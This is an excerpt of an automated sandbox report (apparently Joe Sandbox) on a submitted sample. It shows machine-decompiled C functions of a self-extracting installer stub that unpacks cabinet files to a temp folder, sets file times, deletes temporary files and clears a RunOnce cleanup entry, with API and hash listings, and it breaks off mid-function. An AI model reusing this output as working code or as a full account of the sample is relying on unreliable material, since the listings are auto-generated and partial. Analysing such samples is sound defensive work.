                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F4D,?,00000002,00000000), ref: 00DE5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DE5250
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 878d077225706d8ee5079a24cff19d87f0930813e1d36339f81666f8e889fe20
                                                                                                                                                                                                        • Instruction ID: d0a918e1f0e1075e4835fce6eef3ccfa2ac0572e576a966485e4e7c1f70e7ddb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 878d077225706d8ee5079a24cff19d87f0930813e1d36339f81666f8e889fe20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7311E2B53017C2AFE7647B776C89B3B619DDB88398B10402DB742DA394DAB99C005238
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00DE52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xde91e0; // 0x818e88
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xde8a24 == 0 &&  *0xde9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xde8a24 == 0 &&  *0xde9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00DE1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        					if(( *0xde9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00DE65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00DE2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xde9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00DE1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xde8a20 =  *0xde8a20 & 0x00000000;
                                                                                                                                                                                                        				return E00DE6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(00818E88,00000080,?,00000000), ref: 00DE52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(00818E88), ref: 00DE52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(00818E88,?,00000000), ref: 00DE5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(00818E88), ref: 00DE530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00DE11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-2493987848
                                                                                                                                                                                                        • Opcode ID: 7e0b9c80650c29138acc494fe5ec5af95b568a1d61172f34d63210f285707a89
                                                                                                                                                                                                        • Instruction ID: be88411a949e8a6fbde602cc900052b0d2a7474550f6898b7244a9fce7678080
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e0b9c80650c29138acc494fe5ec5af95b568a1d61172f34d63210f285707a89
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D21CF315017C5DBCB21BB16ED99B69B7A0EB00794F080169E446DA3A8CBB0AC84CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xde8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00DE538C,?,?,00DE538C), ref: 00DE2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00DE538C,wextract_cleanup3,?,?,00DE538C), ref: 00DE2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00DE538C,?,?,00DE538C), ref: 00DE2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 849931509-2968168367
                                                                                                                                                                                                        • Opcode ID: d7dd29f3663217bd826104212c33ef68baae1a21f9c1358d778167d146687711
                                                                                                                                                                                                        • Instruction ID: 91d8a88204c03bc333ae3d69ee72a7947adb40afc62ab31441c00970221a497b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7dd29f3663217bd826104212c33ef68baae1a21f9c1358d778167d146687711
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9E0DF31900398BBD722BB92EC8AF297B3DE700741F140184B908E41A1EB616E08E631
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xde91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00DE4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00DE6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xde8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xde91e4;
                                                                                                                                                                                                        						_t58 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xde91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xde91e4;
                                                                                                                                                                                                        						_t30 = E00DE4702( &_v268, 0xde91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00DE476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00DE4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00DE47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde93f4 =  *0xde93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xde91e4;
                                                                                                                                                                                                        						_t63 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xde91e5;
                                                                                                                                                                                                        						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xde91e4;
						_t30 = E00DE4702( &_v268, 0xde91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00DE4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00DE4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00DE4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d94
                                                                                                                                                                                                        0x00de4d99
                                                                                                                                                                                                        0x00de4d9e
                                                                                                                                                                                                        0x00de4da1
                                                                                                                                                                                                        0x00de4daa
                                                                                                                                                                                                        0x00de4daa
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4db5
                                                                                                                                                                                                        0x00de4dbb
                                                                                                                                                                                                        0x00de4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4dc3
                                                                                                                                                                                                        0x00de4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4dc5
                                                                                                                                                                                                        0x00de4dbd
                                                                                                                                                                                                        0x00de4d2a
                                                                                                                                                                                                        0x00de4d2a
                                                                                                                                                                                                        0x00de4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d2d
                                                                                                                                                                                                        0x00de4cf8
                                                                                                                                                                                                        0x00de4cfd
                                                                                                                                                                                                        0x00de4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00DE4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00DE4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-2493987848
                                                                                                                                                                                                        • Opcode ID: 131bc1ea67ff98b0d4d1faf4dfd9b2aad0cd64451e5a715dda729052067808e2
                                                                                                                                                                                                        • Instruction ID: ede171b29962e733b15bfa77b3984c8f408e4c15532acf6430b4cbf5d9885904
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 131bc1ea67ff98b0d4d1faf4dfd9b2aad0cd64451e5a715dda729052067808e2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C4137366002818BCB21BF3ADD546FAB3A6EB45700F1C4668E886D7285DF31DE46C7B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xde8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xde8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00DE4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 39f8d9abe1f3259c257d2c2fb4aa314eb374a5626fe5aa2d9ea44724186edc38
                                                                                                                                                                                                        • Instruction ID: f377be1aeda3017889705a80ac954ebd7827a7e82bbdc01a34921c1245f2b59e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39f8d9abe1f3259c257d2c2fb4aa314eb374a5626fe5aa2d9ea44724186edc38
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F0967250134D6F9B55FFB5CC48DBB77ACEB08244744052AE415C2050EA31F914D771
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00DE4A23,?,00DE4F67,*MEMCAB,00008000,00000180), ref: 00DE48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00DE4F67,*MEMCAB,00008000,00000180), ref: 00DE4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 625c7517618878f0fc0db579fadf8280cbf85616ebddbcea9dfaf8afb74fb2f7
                                                                                                                                                                                                        • Instruction ID: bcd2868e00fda6c5abf87584376cb4f8feacc157a5090310f06d2d50310fb2d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 625c7517618878f0fc0db579fadf8280cbf85616ebddbcea9dfaf8afb74fb2f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8101FBA7E126B026F324612A4C88FB7551CDB96735F1B0735BDEAEB2D2D5A49C0481F0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
